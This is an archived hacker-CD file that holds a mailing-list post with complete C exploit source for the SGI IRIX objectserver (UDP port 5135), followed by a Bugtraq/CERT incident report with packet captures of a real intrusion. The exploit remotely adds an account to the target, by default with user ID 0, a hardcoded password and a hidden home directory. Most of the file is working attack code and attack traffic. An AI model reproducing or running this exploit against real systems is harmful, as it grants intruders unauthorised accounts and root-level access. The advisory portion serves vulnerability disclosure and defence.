home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 4 / hacker04 / 04_HACK04.ISO / xploits / irix_obj / irix-objectserver.c
Encoding:
C/C++ Source or Header  |  2002-03-18  |  19.3 KB  |  557 lines

  1. At 08:52 AM 3/29/2000 -0500, Howard wrote:
  2. >Since the patches are now officially released, I feel I can finally
  3. >release the details of the SGI objectserver vulnerability.  This
  4. >vulnerability was initailly reported to CERT and SGI Security on
  5. >October 6, 1997.  A beta version of patch 2849 was provided in
  6. >February 1998.
  7. >
  8.  
  9. Hi.  As a legitimate function of my work I routinely archive and catalog
  10. vulnerability information and exploit code.  In the interest of
  11. full-disclosure and in possibly helping system administrators evaluate
  12. the security of their SGI boxen, I am attaching the remote exploit for
  13. Irix objectserver (udp 5135).
  14.  
  15. There are big problems with the US government right now - if you are
  16. doing security work (let alone cracking!) be advised that things are
  17. getting seriously fucked.  See the "L0phtcrack as a burglary tool"
  18. article?  See all these kids getting PRISON sentences for typing?  The
  19. government isn't playing by sane rules.  Be prepared.  Be awake!
  20.  
  21. Marcy
  22.  
  23. /*   Copyright (c) July 1997       Last Stage of Delirium   */
  24. /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF      */
  25. /*                  Last Stage of Delirium                  */
  26. /*                                                          */
  27. /*   The contents of this file  may be disclosed to third   */
  28. /*   parties, copied and duplicated in any form, in whole   */
  29. /*   or in part, without the prior written consent of LSD.  */
  30.  
  31. /*   SGI objectserver "account" exploit
  32. */
  33. /*   Remotely adds account to the IRIX system.
  34. */
  35. /*   Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,
  36. */
  37. /*   which was supposed to be free from this bug (SGI 19960101-01-PX).
  38. */
  39. /*   The vulnerability "was corrected" on 6.2 systems but
  40. */
  41. /*   SGI guys fucked up the job and it still can be exploited.
  42. */
  43. /*   The same considers patched 5.x,6.0.1 and 6.1 systems
  44. */
  45. /*   where SGI released patches DONT work.
  46. */
  47. /*   The only difference is that root account creation is blocked.
  48. */
  49. /*
  50. */
  51. /*   usage: ob_account ipaddr [-u username] [-i userid] [-p]
  52. */
  53. /*       -i  specify userid (other than 0)
  54. */
  55. /*       -u  change the default added username
  56. */
  57. /*       -p  probe if there's the objectserver running
  58. */
  59. /*
  60. */
  61. /*   default account added       : lsd
  62. */
  63. /*   default password            : m4c10r4!
  64. */
  65. /*   default user home directory : /tmp/.new
  66. */
  67. /*   default userid              : 0
  68. */
  69.  
  70.  
  71. #include <sys/types.h>
  72. #include <sys/socket.h>
  73. #include <netinet/in.h>
  74. #include <arpa/inet.h>
  75. #include <netdb.h>
  76. #include <sys/uio.h>
  77. #include <errno.h>
  78. #include <stdio.h>
  79. #define E if(errno) perror("");
  80.  
  81. struct iovec iov[2];
  82. struct msghdr msg;
  83. char buf1[1024],buf2[1024];
  84. int sck;
  85. unsigned long adr;
  86.  
  87. void show_msg(){
  88.     char *p,*p1;
  89.     int i,j,c,d;
  90.  
  91.     c=0;
  92.     printf("%04x   ",iov[0].iov_len);
  93.     p=(char*)iov[0].iov_base;
  94.     for(i=0;i<iov[0].iov_len;i++){
  95.         c++;
  96.         if(c==17){
  97.              printf("    ");
  98.              p1=p;p1=p1-16;
  99.              for(j=0;j<16;j++){
  100.                  if(isprint(*p1)) printf("%c",*p1);
  101.                  else printf(".");
  102.                  p1++;
  103.              }
  104.              c=1;
  105.              printf("\n       ");
  106.         }
  107.         printf("%02x ",(unsigned char)*p++);
  108.     }
  109.     printf("    ");
  110.     p1=p;p1=p1-c;
  111.     if(c>1){
  112.         for(i=0;i<(16-c);i++) printf("   ");
  113.         for(i=0;i<c;i++){
  114.             if(isprint(*p1)) printf("%c",*p1);
  115.             else printf(".");
  116.             p1++;
  117.         }
  118.     }
  119.     printf("\n");
  120.     if(msg.msg_iovlen!=2) return;
  121.  
  122.     c=0;
  123.     p=(char*)iov[0].iov_base;
  124.     d=p[0x0a]*0x100+p[0x0b];
  125.     p=(char*)iov[1].iov_base;
  126.     printf("%04x   ",d);
  127.     for(i=0;i<d;i++){
  128.         c++;
  129.         if(c==17){
  130.              printf("    ");
  131.              p1=p;p1=p1-16;
  132.              for(j=0;j<16;j++){
  133.                  if(isprint(*p1)) printf("%c",*p1);
  134.                  else printf(".");
  135.                  p1++;
  136.              }
  137.              c=1;
  138.              printf("\n       ");
  139.         }
  140.         printf("%02x ",(unsigned char)*p++);
  141.     }
  142.     printf("    ");
  143.     p1=p;p1=p1-c;
  144.     if(c>1){
  145.         for(i=0;i<(16-c);i++) printf("   ");
  146.         for(i=0;i<c;i++){
  147.             if(isprint(*p1)) printf("%c",*p1);
  148.             else printf(".");
  149.             p1++;
  150.         }
  151.     }
  152.     printf("\n");
  153.     fflush(stdout);
  154. }
  155.  
  156. char numer_one[0x10]={
  157. 0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
  158. 0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
  159. };
  160.  
  161. char numer_two[0x24]={
  162. 0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
  163. 0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
  164. 0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
  165. 0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
  166. 0x01,0x07,0x01,0x01
  167. };
  168.  
  169. char dodaj_one[0x10]={
  170. 0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
  171. 0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
  172. };
  173.  
  174. char dodaj_two[1024]={
  175. 0x1c,0x03,0x00,0x43,0x02,0x01,0x1d,0x0a,
  176. 0x01,0x01,0x3b,0x01,0x78
  177. };
  178.  
  179. char dodaj_three[27]={
  180. 0x01,0x02,0x0a,0x01,0x01,0x3b,
  181. 0x01,0x78,0x00,0x00,0x80,0x43,0x01,0x10,
  182. 0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
  183. 0x01,0x01,0x09,0x43,0x01
  184. };
  185.  
  186. char dodaj_four[200]={
  187. 0x17,0x0b,0x01,0x01,0x3b,0x01,0x02,
  188. 0x01,0x01,0x01,0x09,0x43,0x01,0x03,0x4c,
  189. 0x73,0x44,0x17,0x0b,0x01,0x01,0x3b,0x01,
  190. 0x6e,0x01,0x06,0x01,0x09,0x43,0x00,0x17,
  191. 0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,0x07,
  192. 0x01,0x09,0x43,0x00,0x17,0x0b,0x01,0x01,
  193. 0x3b,0x01,0x02,0x01,0x03,0x01,0x09,0x43,
  194. 0x00,0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,
  195. 0x01,0x09,0x01,0x09,0x43,0x00,0x17,0x0b,
  196. 0x01,0x01,0x3b,0x01,0x6e,0x01,0x0d,0x01,
  197. 0x09,0x43,0x00,0x17,0x0b,0x01,0x01,0x3b,
  198. 0x01,0x6e,0x01,0x10,0x01,0x09,0x43,0x00,
  199. 0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
  200. 0x0a,0x01,0x09,0x43,0x00,0x17,0x0b,0x01,
  201. 0x01,0x3b,0x01,0x6e,0x01,0x0e,0x01,0x03,
  202. 0x01,0x09,0x17,0x0b,0x01,0x01,0x3b,0x01,
  203. 0x6e,0x01,0x04,0x01,0x09,0x43,0x01,0x0d,
  204. 0x61,0x6b,0x46,0x4a,0x64,0x78,0x65,0x6e,
  205. 0x4b,0x6e,0x79,0x53,0x2e,0x17,0x0b,0x01,
  206. 0x01,0x3b,0x01,0x6e,0x01,0x11,0x01,0x09,
  207. 0x43,0x01,0x09,0x2f,0x74,0x6d,0x70,0x2f,
  208. 0x2e,0x6e,0x65,0x77,0x17,0x0b,0x01,0x01,
  209. 0x3b,0x01,0x6e,0x01,0x12,0x01,0x09,0x43,
  210. 0x01,0x04,0x72,0x6f,0x6f,0x74,0x17,0x0b,
  211. 0x01,0x01,0x3b,0x01,0x6e,0x01,0x02,0x01,
  212. 0x03
  213. };
  214.  
  215. char dodaj_five[39]={
  216. 0x17,0x0b,0x01,0x01,0x3b,0x01,
  217. 0x6e,0x01,0x13,0x01,0x09,0x43,0x01,0x08,
  218. 0x2f,0x62,0x69,0x6e,0x2f,0x63,0x73,0x68,
  219. 0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
  220. 0x0f,0x01,0x09,0x43,0x01,0x03,'L','S','D'
  221. };
  222.  
  223. char fake_adrs[0x10]={
  224. 0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
  225. 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  226. };
  227.  
  228. char *get_sysinfo(){
  229.     int i=0,j,len;
  230.  
  231.     iov[0].iov_base=numer_one;
  232.     iov[0].iov_len=0x10;
  233.     iov[1].iov_base=numer_two;
  234.     iov[1].iov_len=0x24;
  235.     msg.msg_name=(caddr_t)fake_adrs;
  236.     msg.msg_namelen=0x10;
  237.     msg.msg_iov=iov;
  238.     msg.msg_iovlen=2;
  239.     msg.msg_accrights=(caddr_t)0;
  240.     msg.msg_accrightslen=0;
  241.     printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
  242.     printf("\n");
  243.  
  244.     iov[0].iov_base=buf1;
  245.     iov[1].iov_base=buf2;
  246.     iov[1].iov_len=0x200;
  247.     msg.msg_iovlen=2;
  248.     printf("RM:  --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0));
  249. show_msg();
  250.     printf("\n");
  251.     while(i<len-0x16)
  252.         if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
  253.             printf("remote system ID: ");
  254.             for(j=0;j<buf2[i+6];j++) printf("%02x ",buf2[i+7+j]);
  255.             printf("\n");
  256.             return(&buf2[i+6]);
  257.         }else i++;
  258.     return(0);
  259. }
  260.  
  261. void new_account(int len){
  262.     iov[0].iov_base=dodaj_one;
  263.     iov[0].iov_len=0x10;
  264.     iov[1].iov_base=dodaj_two;
  265.     iov[1].iov_len=len;
  266.     msg.msg_name=(caddr_t)fake_adrs;
  267.     msg.msg_namelen=0x10;
  268.     msg.msg_iov=iov;
  269.     msg.msg_iovlen=2;
  270.     msg.msg_accrights=(caddr_t)0;
  271.     msg.msg_accrightslen=0;
  272.     printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
  273.     printf("\n");
  274.  
  275.     iov[0].iov_base=buf1;
  276.     iov[1].iov_base=buf2;
  277.     iov[1].iov_len=0x200;
  278.     msg.msg_iovlen=2;
  279.     printf("RM:  --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
  280.     printf("\n");
  281. }
  282.  
  283. void info(char *text){
  284.     printf("SGI objectserver \"account\" exploit by LSD\n");
  285.     printf("usage: %s ipaddr [-u username] [-i userid] [-p]\n",text);
  286. }
  287.  
  288. main(int argc,char **argv){
  289.     int c,user,version,probe;
  290.     unsigned int offset,gr_offset,userid;
  291.     char *sys_info;
  292.     char username[20];
  293.     extern char *optarg;
  294.     extern int optind;
  295.  
  296.     if(argc<2) {info(argv[0]);exit(0);}
  297.     optind=2;
  298.     offset=40;
  299.     user=version=probe=0;
  300.     while((c=getopt(argc,argv,"u:i:p"))!=-1)
  301.         switch(c){
  302.         case 'u': strcpy(username,optarg);
  303.                   user=1;
  304.                   break;
  305.         case 'i': version=62;
  306.                   userid=atoi(optarg);
  307.                   break;
  308.         case 'p': probe=1;
  309.                   break;
  310.         case '?':
  311.         default : info(argv[0]);
  312.                   exit(1);
  313.         }
  314.  
  315.     sck=socket(AF_INET,SOCK_DGRAM,0);
  316.     adr=inet_addr(argv[1]);
  317.     memcpy(&fake_adrs[4],&adr,4);
  318.  
  319.     if(!(sys_info=get_sysinfo())){
  320.         printf("error: can't get system ID for %s.\n",argv[1]);
  321.         exit(1);
  322.     }
  323.     if(!probe){
  324.         memcpy(&dodaj_two[0x0d],sys_info,sys_info[0]+1);
  325.         memcpy(&dodaj_two[0x0d+sys_info[0]+1],&dodaj_three[0],27);
  326.         offset+=sys_info[0]+1;
  327.  
  328.         if(!user) strcpy(username,"lsd");
  329.         dodaj_two[offset++]=strlen(username);
  330.         strcpy(&dodaj_two[offset],username);offset+=strlen(username);
  331.         memcpy(&dodaj_two[offset],&dodaj_four[0],200);
  332.         offset+=200;
  333.         gr_offset=offset-15;
  334.         if(version){
  335.             dodaj_two[gr_offset++]='u';
  336.             dodaj_two[gr_offset++]='s';
  337.             dodaj_two[gr_offset++]='e';
  338.             dodaj_two[gr_offset++]='r';
  339.             dodaj_two[offset++]=0x02;
  340.             dodaj_two[offset++]=userid>>8;
  341.             dodaj_two[offset++]=userid&0xff;
  342.         }
  343.         else dodaj_two[offset++]=0x00;
  344.  
  345.         memcpy(&dodaj_two[offset],&dodaj_five[0],39);
  346.         offset+=39;
  347.         dodaj_one[10]=offset>>8;
  348.         dodaj_one[11]=offset&0xff;
  349.         new_account(offset);
  350.     }
  351. }
  352. /* end g23 exploit post */
  353.  
  354.  
  355. __________________________________________________
  356. Do You Yahoo!?
  357. Talk to your friends online with Yahoo! Messenger.
  358. http://im.yahoo.com
  359.  
  360.  
  361.  
  362.  
  363. Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
  364. From: "Howard M. Kash III" <hmkash@ARL.MIL>
  365. Subject:      Objectserver vulnerability
  366. X-To:         BUGTRAQ@securityfocus.com
  367.  
  368.  
  369. Since the patches are now officially released, I feel I can finally
  370. release the details of the SGI objectserver vulnerability.  This
  371. vulnerability was initailly reported to CERT and SGI Security on
  372. October 6, 1997.  A beta version of patch 2849 was provided in
  373. February 1998.
  374.  
  375.  
  376. Howard
  377.  
  378.  
  379. ----- Forwarded message # 1:
  380.  
  381. Date:     Mon, 6 Oct 97 7:09:51 EDT
  382. From:     "Howard M. Kash III"
  383. To:       cert@cert.org, security-alert@sgi.com
  384. Subject:  URGENT - new SGI vulnerability
  385.  
  386.  
  387. [Internal error while calling pgp, raw data follows]
  388. -----BEGIN PGP SIGNED MESSAGE-----
  389.  
  390.  
  391. URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT
  392.  
  393. SGI objectserver vulnerabilty allows remote users to create accounts.
  394.  
  395. Yesterday two of our hosts were compromised by an (as far as I could
  396. determine) unknown, unpatched bug in SGI's objectserver.  The attack
  397. consisted of sending UDP packets to port 5135 (see below).  The
  398. result was a non-root account being added to the system.  The two
  399. compromised hosts were running IRIX 6.2, but the vulnerability may
  400. affect other versions of IRIX.  The vulnerability does not appear to
  401. give root access directly, as the attackers used other IRIX
  402. vulnerabilities to gain root access after logging into the new
  403. account.
  404.  
  405. Attached are the UDP packets exchanged between the attacking host
  406. (aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt).  IP
  407. addresses have been masked to protect the guilty - I mean innocent
  408. until proven guilty.  The result of this sequence of packets is the
  409. following line added to /etc/passwd:
  410.  
  411.     gueust:x:5002:20:LsD:/tmp/.new:/bin/csh
  412.  
  413. An entry must also be added to /etc/shadow since the attacker then
  414. logs into the new account with a password.
  415.  
  416. As a temporary measure we have blocked all traffic to port 5135 at
  417. our gateway.
  418.  
  419.  
  420. Howard Kash
  421. U.S. Army Research Lab
  422.  
  423. - ------------------------------------------------------------------------
  424.  
  425. TCP and UDP headers have been separated out.  I've decoded some of the
  426. packet contents into its ascii equivalent below the line.
  427.  
  428. 16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
  429.                          4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
  430.                          tttt tttt
  431.                                    112a 140f 003c 6516
  432.                                                        0001 0000
  433.                          0001 0000 0000 0024 0000 0000 2103 0043
  434.                          000a 000a 0101 3b01 6e00 0080 4301 0118
  435.                          0b01 013b 016e 0102 0103 0001 0107 0101
  436. 16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
  437.                          4500 007b 0644 0000 3a11 26dc tttt tttt
  438.                          aaaa aaaa
  439.                                    140f 112a 0067 0d37
  440.                                                        0001 0186
  441.                          0001 0000 0000 004f 0000 0000 2903 0043
  442.                          000a 0080 4300 8043 0105 0a01 013b 0178
  443.                          0469 0a79 9a01 330a 0101 3b01 7804 690a
  444.                          799a 0138 0a01 013b 0178 0469 0a79 9a01
  445.                          020a 0101 3b01 7804 690a 799a 0103 0a01
  446.                          013b 0178 0469 0a79 9a01 04
  447. 16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
  448.                          4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
  449.                          tttt tttt
  450.                                    112a 140f 0140 a1b2
  451.                                                        0001 0000
  452.                          0001 0000 0000 0128 0000 0000 1c03 0043
  453.                          0201 1d0a 0101 3b01 7804 690a 799a 0102
  454.                          0a01 013b 0178 0000 8043 0110 170b 0101
  455.                          3b01 6e01 0101 0943 0106 6775 6575 7374
  456.                                                   g u  e u  s t
  457.                          170b 0101 3b01 0201 0101 0943 0103 4c73
  458.                                                             L s
  459.                          4417 0b01 013b 016e 0106 0109 4300 170b
  460.                          D
  461.                          0101 3b01 6e01 0701 0943 0017 0b01 013b
  462.                          0102 0103 0109 4300 170b 0101 3b01 6e01
  463.                          0901 0943 0017 0b01 013b 016e 010d 0109
  464.                          4300 170b 0101 3b01 6e01 1001 0943 0017
  465.                          0b01 013b 016e 010a 0109 4300 170b 0101
  466.                          3b01 6e01 0e01 0301 0917 0b01 013b 016e
  467.                          0104 0109 4301 0d61 6b46 4a64 7865 6e4b
  468.                          6e79 532e 170b 0101 3b01 6e01 1101 0943
  469.                          0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
  470.                               / t  m p  / .  n e  w
  471.                          016e 0112 0109 4301 0470 6f6f 7417 0b01
  472.                          013b 016e 0102 0103 0017 0b01 013b 016e
  473.                          0113 0109 4301 082f 6269 6e2f 6373 6817
  474.                                           /  b i  n /  c s  h
  475.                          0b01 013b 016e 010f 0109 4301 074c 7344
  476.                          2f43 5444
  477. 16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
  478.                          4500 0045 0646 0000 3a11 2710 tttt tttt
  479.                          aaaa aaaa
  480.                                    140f 112a 0031 0ef5
  481.                                                        0001 0187
  482.                          0001 0000 0000 0019 0000 0000 2503 0043
  483.                          0201 1d0a 0080 4300 0a01 013b 0178 0469
  484.                          0a79 9a01 39
  485. 16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
  486.                          4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
  487.                          tttt tttt
  488.                                    112f 140f 003c 6511
  489.                                                        0001 0000
  490.                          0001 0000 0000 0024 0000 0000 2103 0043
  491.                          000a 000a 0101 3b01 6e00 0080 4301 0118
  492.                          0b01 013b 016e 0102 0103 0001 0107 0101
  493. 16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
  494.                          4500 0088 0669 0000 3a11 26aa tttt tttt
  495.                          aaaa aaaa
  496.                                    140f 112f 0074 3f4f
  497.                                                        0001 0188
  498.                          0001 0000 0000 005c 0000 0000 2903 0043
  499.                          000a 0080 4300 8043 0106 0a01 013b 0178
  500.                          0469 0a79 9a01 330a 0101 3b01 7804 690a
  501.                          799a 0138 0a01 013b 0178 0469 0a79 9a01
  502.                          390a 0101 3b01 7804 690a 799a 0102 0a01
  503.                          013b 0178 0469 0a79 9a01 030a 0101 3b01
  504.                          7804 690a 799a 0104
  505. 16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
  506.                          4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
  507.                          tttt tttt
  508.                                    112f 140f 0142 1399
  509.                                                        0001 0000
  510.                          0001 0000 0000 012a 0000 0000 1c03 0043
  511.                          0201 1d0a 0101 3b01 7804 690a 799a 0102
  512.                          0a01 013b 0178 0000 8043 0110 170b 0101
  513.                          3b01 6e01 0101 0943 0106 6775 6575 7374
  514.                          170b 0101 3b01 0201 0101 0943 0103 4c73
  515.                          4417 0b01 013b 016e 0106 0109 4300 170b
  516.                          0101 3b01 6e01 0701 0943 0017 0b01 013b
  517.                          0102 0103 0109 4300 170b 0101 3b01 6e01
  518.                          0901 0943 0017 0b01 013b 016e 010d 0109
  519.                          4300 170b 0101 3b01 6e01 1001 0943 0017
  520.                          0b01 013b 016e 010a 0109 4300 170b 0101
  521.                          3b01 6e01 0e01 0301 0917 0b01 013b 016e
  522.                          0104 0109 4301 0d61 6b46 4a64 7865 6e4b
  523.                          6e79 532e 170b 0101 3b01 6e01 1101 0943
  524.                          0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
  525.                          016e 0112 0109 4301 0475 7365 7217 0b01
  526.                          013b 016e 0102 0103 0213 8a17 0b01 013b
  527.                          016e 0113 0109 4301 082f 6269 6e2f 6373
  528.                          6817 0b01 013b 016e 010f 0109 4301 074c
  529.                          7344 2f43 5444
  530. 16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
  531.                          4500 0045 0671 0000 3a11 26e5 tttt tttt
  532.                          aaaa aaaa
  533.                                    140f 112f 0031 0dee
  534.                                                        0001 0189
  535.                          0001 0000 0000 0019 0000 0000 2503 0043
  536.                          0201 1d0a 0080 4300 0a01 013b 0178 0469
  537.                          0a79 9a01 3a
  538.  
  539. -----BEGIN PGP SIGNATURE-----
  540. Version: 2.6.2
  541.  
  542. iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee
  543. nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w
  544. I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+
  545. n9jE26XP5HU=
  546. =yKsl
  547. -----END PGP SIGNATURE-----
  548.  
  549.  
  550. ----- End of forwarded messages
  551.  
  552.  
  553. [End of raw data]
  554.  
  555.  
  556.  
  557.